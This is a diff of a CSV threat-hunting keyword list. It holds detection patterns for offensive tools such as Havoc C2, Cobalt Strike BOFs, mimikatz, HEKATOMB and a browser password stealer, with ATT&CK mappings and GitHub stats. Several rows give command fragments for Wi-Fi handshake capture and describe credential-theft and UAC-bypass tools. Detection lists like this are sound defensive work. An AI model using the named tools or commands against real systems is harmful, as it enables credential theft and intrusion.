+"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 
- T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 
- TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" 
+"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. 
upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1553","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z" +"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1555","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z" "*hcxhashtool -i *.hashcat --info stdout*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hcxpcapngtool --all -o *.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*hcxpcapngtool -o *.hashcat *.pcapng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" "*headers/exploit.h*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*headers/HandleKatz.h*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" "*HeapCrypt-main*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" 
@@ -11193,16 +11344,16 @@
 "*hekatomb*-hashes *","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
 "*hekatomb-*-py3-none-any.whl*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
 "*hekatomb@thiefin.fr*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
-"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
-"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
+"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z"
 "*HelloReflectionWorld.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*hellsgate.asm*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
 "*HellsGate.exe*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
 "*HellsGate.sln*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
 "*HellsGate.vcxproj*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z"
 "*help\dll.txt*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
-"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z"
+"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
 "*Henkru/cs-token-vault*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z"
 "*henry-richard7/Browser-password-stealer*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
 "*Heroinn FTP*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
@@ -11214,89 +11365,91 @@ "*HeroinnApp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnProtocol*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnServerCommand*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*hfiref0x/WDExtract*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Hibr2Dmp.exe*","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" -"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
